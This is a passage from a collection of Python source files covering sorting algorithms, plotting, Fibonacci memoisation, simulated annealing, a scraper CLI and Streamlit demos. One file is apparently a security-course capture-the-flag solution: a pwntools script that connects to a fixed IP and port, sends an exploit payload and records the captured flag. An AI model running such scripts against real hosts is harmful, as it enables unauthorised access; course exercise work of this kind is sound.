heapify(arr, i, 0)\n\n#the time complexity is O(nlogn)\n\ndef partition(arr,low,high): \n i = ( low-1 ) # index of smaller element \n pivot = arr[high] # pivot \n \n for j in range(low , high): \n \n # If current element is smaller than or \n # equal to pivot \n if arr[j] <= pivot: \n \n # increment index of smaller element \n i = i+1 \n arr[i],arr[j] = arr[j],arr[i] \n \n arr[i+1],arr[high] = arr[high],arr[i+1] \n return ( i+1 ) \n \n# The main function that implements QuickSort \n# arr[] --> Array to be sorted, \n# low --> Starting index, \n# high --> Ending index \n \n# Function to do Quick sort \ndef quickSort(arr,low,high): \n if low < high: \n \n # pi is partitioning index, arr[p] is now \n # at right place \n pi = partition(arr,low,high) \n \n # Separately sort elements before \n # partition and after partition \n quickSort(arr, low, pi-1) \n quickSort(arr, pi+1, high) \n\n#time complexity = O(nlogn)\n\ndef mergeSort(arr): \n if len(arr) >1: \n mid = len(arr)//2 #Finding the mid of the array \n L = arr[:mid] # Dividing the array elements \n R = arr[mid:] # into 2 halves \n \n mergeSort(L) # Sorting the first half \n mergeSort(R) # Sorting the second half \n \n i = j = k = 0\n \n # Copy data to temp arrays L[] and R[] \n while i < len(L) and j < len(R): \n if L[i] < R[j]: \n arr[k] = L[i] \n i+=1\n else: \n arr[k] = R[j] \n j+=1\n k+=1\n \n # Checking if any element was left \n while i < len(L): \n arr[k] = L[i] \n i+=1\n k+=1\n \n while j < len(R): \n arr[k] = R[j] \n j+=1\n k+=1\n#time complexity is O(nlogn)","sub_path":"sorting/sortings.py","file_name":"sortings.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463412396","text":"#!/usr/bin/env python\n#BALSN{4M4z31nG_bUg_F0uNd_bY_KLEE!!}\nfrom pwn import *\n\nhost = \"140.112.31.96\"\nport = 10132\n\nr = remote(host, port)\npayload = \"ddddssaaaassssddddddwddwwaawwwddddsss\"\nr.sendline(payload)\nr.interactive()\n","sub_path":"Computer-Security/hw3-solution/code2a.py","file_name":"code2a.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"432617516","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport argparse\n\n\ndef surface(data, file):\n Z = np.array(data)\n X = np.arange(0, 1, 1.0 / Z.shape[1])\n Y = np.arange(0, 1, 1.0 / Z.shape[0])\n X2D, Y2D = np.meshgrid(X, Y)\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.plot_surface(X2D, Y2D, Z)\n plt.subplots_adjust(wspace=0.5, hspace=0.6)\n plt.savefig('{}.pdf'.format(file))\n\n\ndata = pd.read_csv(\"result.txt\", header=None, sep=' ')\nsurface(data, \"surface\")\n","sub_path":"dirichlet_problem_mpi/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"346488719","text":"import time\n\nbufor = {}\n\ndef fibonacci(n):\n global bufor\n if n in bufor:\n return bufor[n]\n\n if n == 0:\n wynik = 0\n elif n == 1:\n wynik = 1\n else:\n wynik = fibonacci(n-1) + fibonacci(n-2)\n bufor[n] = wynik\n return wynik\n\npoczatek = time.time()\n\nfor i in range(0, 101):\n wynik = fibonacci(i)\n print(i, wynik)\n\nkoniec = time.time()\nczas = koniec - poczatek\nprint('Wszystkie 100 liczb obliczono w', czas, 'sekund.')\n","sub_path":"memoizacja_fibonacciego.py","file_name":"memoizacja_fibonacciego.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"271059263","text":"# simulated annealing a n-dimensional objective function\nfrom numpy import mean\nfrom numpy import exp\nfrom numpy.random import randn\nfrom numpy.random import rand\nfrom numpy import asarray\nfrom numpy.random import seed\nfrom matplotlib import pyplot\nimport pandas as pd\nimport Fitting as Fit\nimport Gillespie as Glp\nimport os\nimport pickle\n\nclass Simulated_Annealing():\n\n\tdef __init__(self):\n\t\t# initialise constants\n\t\tself.species_lenser = [\"x\",\"y\",\"z\"] # z inner und x free, y loosely bound\n\t\t# loss side\n\t\tself.L_lenser = pd.DataFrame({\"reaction01\":[0, 0, 0], # außen - x\n\t\t\t\t\t\"reaction02\":[1, 0, 0], # x - y\n\t\t\t\t\t\"reaction03\":[0, 1, 0], # y - z\n\t\t\t\t\t\"reaction11\":[1, 0, 0], # x - außen\n\t\t\t\t\t\"reaction12\":[0, 1, 0], # y - x\n\t\t\t\t\t\"reaction13\":[0, 0, 1]}, # z - y\n\t\t\t\t\tindex = self.species_lenser)\n\t\t# gain side\n\t\tself.R_lenser = pd.DataFrame({\"reaction01\":[1, 0, 0], # außen - x\n\t\t\t\t\t\"reaction02\":[0, 1, 0], # x - y\n\t\t\t\t\t\"reaction03\":[0, 0, 1], # y - z\n\t\t\t\t\t\"reaction11\":[0, 0, 0], # x - außen\n\t\t\t\t\t\"reaction12\":[1, 0, 0], # y - x\n\t\t\t\t\t\"reaction13\":[0, 1, 0]}, # z - y\n\t\t\t\t\tindex = self.species_lenser)\n\t\tself.N_lenser = self.R_lenser - self.L_lenser\n\n\t\t# number of fluorescent molecules after bleach\n\t\tself.startQuantities_lenser = {\"x\":[0],\"y\":[0],\"z\":[0]}\n\n\t\tself.time_limit_lenser = 1160.0 # see time axis of measured data\n\t\tself.runs_lenser = 40\n\t\t# colours for plotting\n\t\tself.colours_lenser = {\"x\":\"red\", \"y\":\"forestgreen\", \"z\":\"lightblue\"}\n\t\t# component of the measured FRAP data to be fittet to\n\t\tself.pml_component = \"PML I WT\"\n\n\t\tself.measurement = pd.read_csv(\"./../Daten/FRAP_comparison_all_new_AssemblyDynamicsOfPMLNuclearBodiesInLivingCells_cleaned.csv\", index_col=\"time[s]\")\n\t\tself.measured_times = self.measurement.index.tolist()\n\t\tself.time_intervals = Fit.divide_time_axis_equidistantly(self.measured_times)\n\n\t\tself.storage_path = './../Daten/SimulatedAnnealing/WeidtkampPeters_Lenser/'\n\t\tself.track_data =[]\n\n\t# objective function\n\tdef objective_function(self, parameters):\n\t\tif len(parameters) != len(self.L_lenser.columns):\n\t\t\traise IndexError('The number of parameters has to equal the number of reactions in the given reaction network.')\n\t\tconstants = {reaction:parameters[i] for i, reaction in enumerate(self.L_lenser.columns)}\n\t\t# TODO: delete print\n\t\t# print(constants)\n\t\t# simulate one or more Gillespie runs\n\t\ttrajectories = Glp.monte_carlo_gillespie(constants, self.L_lenser, self.N_lenser, self.startQuantities_lenser, runs=self.runs_lenser, time_max=self.time_limit_lenser)\n\t\t# list of tuples of gillespie times_list and added_quantities_list for output signal\n\t\tlist_of_output_data = Glp.make_output_signal(trajectories, self.species_lenser)\n\t\t# DataFrame of averaged gillespie data per time interval, time intervals as index\n\t\tassigned_simulation_data = Fit.assign_simulation_times_to_time_ranges_average(self.time_intervals,self.measured_times,list_of_output_data)\n\t\t# normalize the simulation data\n\t\tnorm_value = 273 # max 200 molecules in a ROI\n\t\tnormalized_assigned_simulation_data = assigned_simulation_data/norm_value\n\t\t# calculate the absolute differences between the simulated and measured data\n\t\tdifferences = Fit.calculate_differences(self.measurement[self.pml_component], normalized_assigned_simulation_data)\n\t\t# create a quality score by adding up the differences per individual run and averaging the sums\n\t\tquality_of_fitness = mean(differences.sum())\n\t\tself.track_data = [trajectories, normalized_assigned_simulation_data, differences, quality_of_fitness]\n\t\t\n\t\treturn quality_of_fitness\n\n\t# simulated annealing algorithm\n\tdef simulated_annealing(self, objective, bounds, n_iterations, step_size, temp):\n\t\t# create a path to save all files, if needed\n\t\tif not os.path.exists(self.storage_path):\n\t\t\tos.makedirs(self.storage_path)\n\t\t# generate an initial solution\n\t\tbest = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n\t\t# evaluate the initial solution\n\t\tbest_eval = objective(best)\n\t\t# store simulation data\n\t\tstorage_file = self.storage_path + 'simulation-1_data_pickle_binary'\n\t\twith open(storage_file, 'bw') as dumpfile:\n\t\t\tpickle.dump(self.track_data, dumpfile)\n\t\t# current working solution\n\t\tworking, working_eval = best, best_eval\n\t\tbest_scores = []\n\t\t# run simulated annealing\n\t\tfor i in range(n_iterations):\n\t\t\t# get another solution\n\t\t\tcandidate = working + randn(len(bounds)) * step_size\n\t\t\t# the rate constant values of the candidate shall be between 0 (do not take place) and 1 (fully take place)\n\t\t\tfor candi in range(len(candidate)):\n\t\t\t\tif candidate[candi] < 0:\n\t\t\t\t\tcandidate[candi] = 0.0\n\t\t\t\tif candidate[candi] > 1:\n\t\t\t\t\tcandidate[candi] = 1.0\n\t\t\tif sum(candidate) == 0:\n\t\t\t\tprint(\"The combination of the input parameters has resulted in the overall reactivity of the system a0 being 0. The simulation run %d was therefore skipped.\" % i)\n\t\t\t\tcontinue\n\t\t\t# evaluate candidate solution\n\t\t\tcandidate_eval = objective(candidate)\n\t\t\t# store simualtion data\n\t\t\tstorage_file = self.storage_path + 'simulation+' + str(i) + '_data_pickle_binary'\n\t\t\twith open(storage_file, 'bw') as dumpfile:\n\t\t\t\tpickle.dump(self.track_data, dumpfile)\n\t\t\t# check, if the candidate is better than the current best\n\t\t\tif candidate_eval < best_eval:\n\t\t\t\t# store new best solution\n\t\t\t\tbest, best_eval = candidate, candidate_eval\n\t\t\t\t# keep track of scores\n\t\t\t\tbest_scores.append(best_eval)\n\t\t\t\t# report progress\n\t\t\t\tprint('>%d eval(%s) = %.5f' % (i, best, best_eval))\n\t\t\telse:\n\t\t\t\tprint('>%d' % i)\n\t\t\t# difference between candidate and working solution evaluation\n\t\t\tdiff = candidate_eval - working_eval\n\t\t\t# calculate temperature for current epoch\n\t\t\tt = temp / float(i + 1)\n\t\t\t# calculate metropolis acceptance criterion\n\t\t\tmetropolis = exp(-diff / t)\n\t\t\t# check if we should keep the new solution\n\t\t\tif diff < 0 or rand() < metropolis:\n\t\t\t\t# store the new working solution\n\t\t\t\tworking, working_eval = candidate, candidate_eval\n\t\treturn [best, best_eval, best_scores]\n\ndef run_simulated_annealing():\n\t# seed the pseudorandom number generator\n\t# seed(1)\n\t# object\n\tobj = Simulated_Annealing()\n\t# create ranges for the number of parameters to be optimised\n\tbounds = asarray([[0.0, 1.0]]*len(obj.L_lenser.columns))\n\t# number of annealing iterations\n\tn_iterations = 100\n\t# maximum step size\n\tstep_size = 0.1\n\t# initial temperature\n\ttemperature = 50\n\t# perform the simulated annealing search\n\tbest, score, scores = obj.simulated_annealing(obj.objective_function, bounds, n_iterations, step_size, temperature)\n\tprint('Done!')\n\tprint('f(%s) = %f' % (best, score))\n\t# line plot of best scores\n\tpyplot.plot(scores, '.-')\n\tpyplot.xlabel('Improvement Number')\n\tpyplot.ylabel('Evaluation objective(c)')\n\tpyplot.show()\n\n\treturn obj\n","sub_path":"Simulated_Annealing.py","file_name":"Simulated_Annealing.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215553893","text":"'''\nQuestion:\nWrite a program that calculates and prints the value according to the given formula:\nQ = Square root of [(2 * C * D)/H]\nFollowing are the fixed values of C and H:\nC is 50. H is 30.\nD is the variable whose values should be input to your program in a comma-separated sequence.\nExample\nLet us assume the following comma separated input sequence is given to the program:\n100,150,180\nThe output of the program should be:\n18,22,24\n'''\nimport math\nC = 50\nH = 30\ncomma = ','\ndef getD():\n S = input('Please input a comma separated input sequence of D:')\n result = S.split(comma)\n return(result)\ndef formula(D):\n Q = []\n for i in range(len(D)):\n result = round(math.sqrt((2 * C * int(D[i])) / H))\n Q.append(str(result))\n return Q\nD = getD()\nQ = formula(D)\nprint(comma.join(Q))\n\n'''\nSolution:\n#!/usr/bin/env python\nimport math\nc=50\nh=30\nvalue = []\nitems=[x for x in raw_input().split(',')]\nfor d in items:\n value.append(str(int(round(math.sqrt(2*c*float(d)/h)))))\n\nprint ','.join(value)\n'''","sub_path":"program/Q6.py","file_name":"Q6.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"624613080","text":"from content_scraper import setup_logging\nfrom dotenv import load_dotenv\nimport content_scraper.pipelines.single as single\nimport argparse\n\n\nload_dotenv()\nsetup_logging()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Perform a text scrape\")\n parser.add_argument(\n \"platform\",\n type=str,\n help=\"a platform to scrape from various text input sources\",\n )\n parser.add_argument(\n \"-l\",\n \"--limit\",\n type=int,\n help=\"number of texts per keyword\",\n )\n args = parser.parse_args()\n\n single.batch_collect_single_platform(args.platform, limit=args.limit)\n\n print(\"Single collection complete\")\n","sub_path":"content_scraper/content_scraper_cli.py","file_name":"content_scraper_cli.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"50210701","text":"import textwrap\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport time\n\nst.title('Streamlit 超入門')\n\n# st.write('Display Image')\n\n# df = pd.DataFrame(\n# np.random.rand(100,2)/[50,50] + [35.69, 139.70],\n# columns = ['lat', 'lon']\n# )\n\n#st.write(df)\n#st.table(df.style.highlight_max(axis = 0))\n#st.line_chart(df)\n#st.area_chart(df)\n#st.bar_chart(df)\n#st.map(df)\n\n# if st.checkbox('Show Image'):\n# img = Image.open('IMG_0261 (2).jpg')\n# st.image(img, caption='mogmog', use_column_width=True)\n\n# option = st.selectbox(\n# 'あなたが好きな数字を教えてください',\n# list(range(1,11)))\n# 'あなたの好きな数字は',option,'です'\n\n# text = st.text_input('あなたの趣味を教えてください')\n# 'あなたの趣味は',text,'です'\n\n# condition = st.slider('あなたの今の調子は?',0,100,50)#min,max,start値\n# 'コンディション',condition,'です'\n\n# # st.sidebarって書くと、サイドバーに持っていける\n# text = st.sidebar.text_input('あなたの趣味を教えてください')\n# 'あなたの趣味は',text,'です'\n\n# condition = st.sidebar.slider('あなたの今の調子は?',0,100,50)#min,max,start値\n# 'コンディション',condition,'です'\n\n\n\nst.write('プログレスバーの表示')\n'Start!'\nlatest_iteration = st.empty()\nbar = st.progress(0)\nfor i in range(100):\n latest_iteration.text(f'Iteration{i+1}')\n bar.progress(i+1)\n time.sleep(0.1)\n'Done'\n\n\n\n\n\nleft_columns, right_columns = st.columns(2)\nbutton = left_columns.button('右カラムに文字を表示')\nif button:\n right_columns.write('ここは右カラムです')\n\nexpander = st.expander('問い合わせ')\nexpander.write('問い合わせ内容を書く')\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"124066734","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport re\nfrom clog import clog\n\n\nclog = clog()\nclog.setLevel(\"e|v\")\n\nALLOCATION_PATTERN = \"C|%d|Allocation rate\"\ndef calculate_mem_alloc(name):\n fd = open(name, \"r\")\n content = fd.readlines()\n #step 1 find pid\n pid = 0\n for log in content:\n if \"bindApplication\" in log:\n tmp = re.findall(r\"\\([\\s|\\d]*\\)\", log.strip())\n if tmp:\n pid = int(tmp[0][1:-1])\n clog.d(\"pid = %d\" % (pid))\n else:\n clog.e(\"Error: Can't parse pid!\")\n return\n break\n keyword = ALLOCATION_PATTERN % pid\n resList = []\n for log in content:\n if keyword in log:\n tmp = re.findall(r\"\\d+\\.\\d+\", log)\n if tmp:\n ts = float(tmp[0])\n clog.d(\"ts = %f\" % (ts))\n else:\n clog.e(\"Error: Can't parse ts!\")\n return\n\n tmp = re.findall(r\"\\d*\\\\n\", log)\n if tmp:\n rate = int(tmp[0][:-2])\n clog.d(\"rate = %d\" % (rate))\n else:\n clog.e(\"Error: Can't parse rate!\")\n return\n resList.append([ts, rate])\n total = 0\n for i in range(1, len(resList)):\n duration = (resList[i][0] - resList[i - 1][0]) * 1000\n total += resList[i - 1][1] * duration\n clog.d(\"current toal = %d\" % total)\n\n duration = resList[-1][0] - resList[0][0]\n clog.v(\"%s: \" % name)\n clog.v(\"total = %d\" % total)\n clog.v(\"duartion = %f ms\" % (duration * 1000))\n \n\n\n \ndef main():\n if len(sys.argv) < 2:\n clog.e(\"Error: no args!\")\n sys.exit()\n\n for i in xrange(1, len(sys.argv)):\n calculate_mem_alloc(sys.argv[i])\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"calculate_mem_alloc.py","file_name":"calculate_mem_alloc.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"555002433","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg1 = cv2.imread('../images/example1.png', 0)\nimg2 = cv2.imread('../images/example2.png', 0)\n\nsift = cv2.SIFT_create()\n#sift = cv2.AKAZE_create()\n#sift = cv2.BRISK_create()\n\n# find the keypoints and descriptors with SIFT\n(kps1, descs1) = sift.detectAndCompute(img1, None)\n(kps2, descs2) = sift.detectAndCompute(img2, None)\n\n# BFMatcher with default params\nbf = cv2.BFMatcher()\nmatches = bf.knnMatch(descs1, descs2, k=2)\n\n#Find the 2 nearest neighbors for a given descriptor. Let d1 be the distance to the nearest neighbor and d2 be the distance to the next one. \n#In order to accept the nearest neighbor as a \"match\", d1/d2 ratio should be smaller than a given threshold. \n#The motivation behind this test is that we expect a good match to be much closer to the query feature than the second best match.\n# Because if both features are similarly close to the query, we cannot decide which one is really the best one.\n \n# Apply ratio test\ngood = []\nfor m, n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n# cv2.drawMatchesKnn expects list of lists as matches.\nimg3 = cv2.drawMatchesKnn(img1, kps1, img2, kps2, good, None, flags=2)\nplt.imshow(img3), plt.show()\ncv2.imwrite('img3.jpg', img3)\n","sub_path":"lectures/2-partial-exam/11-lec/2-Клучни-локални-дескриптори/Examples/SIFT/sift-match.py","file_name":"sift-match.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"149965918","text":"open(\"output.txt\",'w')\r\n\r\nwith open('AssessmentTrainSet.txt','r') as AssessmentTrainSet:\r\n with open('ResultsTrainSet.txt','r') as ResultsTrainSet:\r\n\r\n PR_SUM = [0.0 for i in range(0,11)]\r\n mAP = [0.0 for i in range(0,16)]\r\n \r\n for queryIndex in xrange(0,16):\r\n\r\n def readData(inputstream):\r\n while True:\r\n title = inputstream.readline().split()\r\n if len(title) > 0 and title[0] == 'Query':\r\n break\r\n \r\n num = int(title[3])\r\n return [inputstream.readline() for i in range(0,num)]\r\n\r\n #Assessment\r\n Assessment = readData(AssessmentTrainSet)\r\n Assessment = [temp[:-2] for temp in Assessment] #-2 is for delete \\r\\n\r\n\r\n #Results\r\n Results = readData(ResultsTrainSet)\r\n Results = [temp.split()[0] for temp in Results]\r\n\r\n class Recall_Precision:\r\n def __init__(self, R=None, P=None):\r\n self.R = R if R is not None else 0.0\r\n self.P = P if P is not None else 0.0\r\n \r\n #calcualte RP\r\n RP = []\r\n for index,query in enumerate(Results,1):\r\n for ans in Assessment:\r\n if query == ans: \r\n R = (len(RP)+1)*100 / float(len(Assessment))\r\n P = (len(RP)+1)*100 / float(index)\r\n RP.append(Recall_Precision(R,P))\r\n break\r\n if len(RP) == len(Assessment):\r\n break\r\n\r\n #PR10 (formula I)\r\n PR10 = [0.0 for i in range(0,11)]\r\n iterRP = len(RP)-1\r\n PR10[10] = RP[iterRP].P\r\n \r\n for i in xrange(9,-1,-1):\r\n maxP = PR10[i+1]\r\n while iterRP >= 0: \r\n if RP[iterRP].R < i*10:\r\n break\r\n if RP[iterRP].P > maxP: \r\n maxP = RP[iterRP].P\r\n iterRP -= 1\r\n PR10[i] = maxP\r\n \r\n #PR_SUM\r\n for i in xrange(0,11):\r\n PR_SUM[i] += PR10[i]\r\n\r\n #mAP (formula III)\r\n for iterRP in RP:\r\n mAP[queryIndex] += iterRP.P\r\n mAP[queryIndex] /= len(Assessment)\r\n\r\n #Print PR and PR10\r\n with open(\"output.txt\",'a') as output:\r\n output.write(\"\\nQuery NO.\" + str(queryIndex))\r\n output.write(\"\\nP\\t\\t\\tR\\n\")\r\n for iterRP in RP:\r\n output.write(str(iterRP.P) + \"\\t\\t\" + str(iterRP.R) + \"\\n\")\r\n for index,iterPR10 in enumerate(PR10):\r\n output.write(str(index*10) + \"%\\t\\t\" + str(iterPR10) + \"\\n\")\r\n \r\n #PR_AVG (formula II)\r\n PR_AVG = [PR_SUM[i]/16 for i in range(0,11)]\r\n\r\n #mAP_AVG\r\n mAP_AVG = sum(mAP)/(16*100)\r\n\r\n #Print PR_AVG and mAP_AVG\r\n with open(\"output.txt\",'a') as output:\r\n output.write(\"\\nPR_AVG:\\n\")\r\n for index,iterPR_AVG in enumerate(PR_AVG):\r\n output.write(str(iterPR_AVG) + \"\\t\\t\" + str(index*10) + \"%\\n\")\r\n output.write(\"\\nmAP_AVG : \" + str(mAP_AVG) + \"\\n\")\r\n","sub_path":"HW1/60347046S_HW1.py","file_name":"60347046S_HW1.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"163544888","text":"#Text Slicing\nimport random\n\ngetText = \"Singapore GDP Data\"\n#0123456789\n#Singapore GDP Data\n\n#-1 -2 -3 -4\n# a t a D\n\n\n#for i in range(len(getText)):\n# print(getText[i], end=\"\")\n \n\"\"\"\nprint(\"\")\nj = -1 \nfor i in range(len(getText)):\n print(getText[j], end=\"\")\n j-=1\n\"\"\"\n######################################################3 \ngetText = -1 \nwhile(getText != 0):\n getText = input(\"\\nGet Text: \") \n if getText == \"0\":\n break\n \n lowIdx = random.randrange(-(len(getText)), len(getText))\n highIdx = random.randrange(-(len(getText)), len(getText)) \n if(lowIdx > highIdx):\n temp = lowIdx\n lowIdx = highIdx\n highIdx = temp\n \n print(str(lowIdx) + \" \" + str(highIdx)) \n print(\"[\", end=\"\")\n #[startIdx:endIdx]\n print(getText[lowIdx: highIdx], end=\"\")\n print(\"]\", end=\"\")\n \n ","sub_path":"CH4_TextSlicing.py","file_name":"CH4_TextSlicing.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"169742455","text":"#!/usr/bin/python3\n\"\"\"\nORM queries that modify the databse\n\n\"\"\"\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n # lets create a Session object\n ses = Session()\n output = ses.query(State).filter(State.id == 2)\n # if you want to reset the autoincrement use:\n # ALTER TABLE states AUTO_INCREMENT = 1;\n for elem in output:\n elem.name = \"New Mexico\"\n ses.commit()\n ses.close()\n","sub_path":"0x0F-python-object_relational_mapping/12-model_state_update_id_2.py","file_name":"12-model_state_update_id_2.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94648692","text":"def readfile(gradefile):\n '''(file open for reading)->dict of {float:list of str}\n read the grades from gradefile anf teturn a dictionary'''\n\n line = gradefile.readline()\n\n grade_to_ids = {}\n b=line.split(' ')\n while line != '':\n for int in range(0,len(b)-1,2):\n student_id =b[int]\n grade = float(b[int+1])\n \n if grade not in grade_to_ids:\n grade_to_ids[grade] = [student_id]\n else:\n grade_to_ids[grade].append(student_id)\n \n line = gradefile.readline()\n b=line.split(' ')\n \n return grade_to_ids\n\nif __name__ == '__main__':\n gradefile = open('/home/zhangpeng/github/python_project/text/record')\n print(readfile(gradefile))\n\n\n","sub_path":"cherk/readfile3.py","file_name":"readfile3.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"627667276","text":"import sqlite3 as lite\nimport pandas as pd\ncon = lite.connect('getting_started.db')\nwith con:\n cur = con.cursor()\n sql = \"SELECT name, state, year, warmth_month, cold_month FROM cities \" \\\n \"INNER JOIN weather \" \\\n \"ON name = city\"\n cur.execute(sql)\n\nrows = cur.fetchall()\ncols = [desc[0] for desc in cur.description]\ndf = pd.DataFrame(rows, columns=cols)\n# print(df)\nfor index, row in df.iterrows():\n print(\"In %s the warmest month is %s\" %(row['name'],row['warmth_month']))","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"328153716","text":"import xgboost as xgb\nimport pandas as pd\nimport numpy as np\nimport time\n\ndef get_data():\n dtrain = pd.read_csv('dtrain.csv').iloc[:, 1:]\n dtest = pd.read_csv('dtest.csv').iloc[:, 1:]\n labels = pd.read_csv('train_y.csv')\n return dtrain, labels, dtest\n\ndef get_binary_data():\n xgb_dtrain = xgb.DMatrix('xgb.dtrain')\n xgb_dtest = xgb.DMatrix('xgb.dtest')\n test_uid = pd.read_csv('test_x.csv').iloc[:,0]\n return xgb_dtrain, xgb_dtest, test_uid\n\ndef main():\n #dtrain, labels, dtest = get_data()\n #xgb_dtrain = xgb.DMatrix(dtrain, label=1-labels.y)\n #xgb_dtest = xgb.DMatrix(dtest)\n\n xgb_dtrain, xgb_dtest, test_uid = get_binary_data()\n\n # setup parameters for xgboost\n param = {}\n param['booster'] = 'gbtree'\n param['objective'] = 'binary:logistic'\n param['scale_pos_weight'] = 8.7\n param['gamma']=0\n param['lambda']= 700\n param['subsample']=0.75\n param['colsample_bytree']=0.30\n param['min_child_weight']=5\n param['max_depth']=8\n param['eta']=0.03\n param['metrics']='auc'\n\n watchlist = [ (xgb_dtrain,'train')]\n num_round = 1820\n bst = xgb.train(param, xgb_dtrain, num_round, watchlist)\n\n pred = bst.predict(xgb_dtest)\n result = pd.DataFrame(test_uid)\n result['score'] = pd.Series(pred)\n result.to_csv(str(time.time())+'.csv', index=False)\nif __name__ == '__main__':\n main()\n\n arr = np.array([1,2,3,4])\n arr.sum()\n np.loadtxt()\n np.savetxt()\n np.tile()","sub_path":"xgboost/DataCastle/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"197256931","text":"def format_result(result, event='3x3x3'):\n if event == '3x3x3 Fewest Moves':\n return _format_result_FMC(result)\n\n elif event == '3x3x3 Multi-Blindfolded':\n return _format_result_multi(result)\n\n elif result > 10 * 60 * 100: # mins * secs * millisecs\n return _format_result_OVER_10MIN(result)\n\n elif result < 60 * 100: # mins * millisecs\n return _format_result_UNDER_1MIN(result)\n\n else:\n minutes = int(result / 6000)\n return shrink_or_enlarge_string(str(minutes)) + \":\" + _format_result_UNDER_1MIN(result % 6000)\n\ndef _format_result_FMC(result):\n # Single\n if result < 100:\n return str(result)\n # Mean of 3\n else:\n moves, millimoves = int(result / 100), result % 100\n return str(moves) + \".\" + str(millimoves)\n\ndef _format_result_multi(result):\n missed = result % 100\n time_in_sec = int((result % 1000000) / 100)\n minutes, seconds = int(time_in_sec / 60), time_in_sec % 60\n difference = 99 - int(result / 10000000)\n solved = difference + missed\n attempted = solved + missed\n\n return str(solved) + \"/\" + str(attempted) + \" in \" + str(minutes) + \":\" + str(seconds)\n\ndef _format_result_OVER_10MIN(result):\n minutes, seconds = int(result / 6000), result % 6000\n return shrink_or_enlarge_string(str(minutes)) + \":\" + shrink_or_enlarge_string(str(seconds)) + \".\" + str(result % 100)\n\ndef _format_result_UNDER_1MIN(result):\n seconds, millis = int(result / 100), result % 100\n return str(seconds) + \".\" + shrink_or_enlarge_string(str(millis))\n\ndef shrink_or_enlarge_string(input_string, string_length = 2):\n while len(input_string) > string_length:\n input_string = input_string[1:]\n while len(input_string) < string_length:\n input_string = '0' + input_string\n return input_string","sub_path":"src/lib/utils/WCA_result_to_string.py","file_name":"WCA_result_to_string.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"405482335","text":"import sys\nimport serial\n\ndef main():\n\tport = serial.Serial(\"/dev/ttyS0\", 57600, timeout=0, dsrdtr=False, rtscts=False, xonxoff=False)\n\twhile True:\n\t\tb = serial.read()\n\t\tprint(b)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"SerialTest.py","file_name":"SerialTest.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"106796157","text":"import os\nimport threading\nimport numpy as np\n\n#import math as m\n\ndef Combine_volumes(list_of_files,outfilename):\n \n # assumes that the spacing is the same for all volumes and that they allign on a common grid.\n \n layers=[]\n dims=[]\n origin=[]\n spacing=[]\n \n cnt=0\n\n for file in list_of_files:\n if not os.path.exists(file):\n raise ValueError(\"Path %s does not exist.\" % file)\n \n tmp=importlayer(filename=file, importer='[Teem Importer]', mode='data')\n layers.append(tmp[0])\n\n # this is a bit of a trick to get the group number. It only works with a fresh session with no other layers loaded.\n # Additionally, each of the files must be in a seperate group (and assumption to combine them)\n 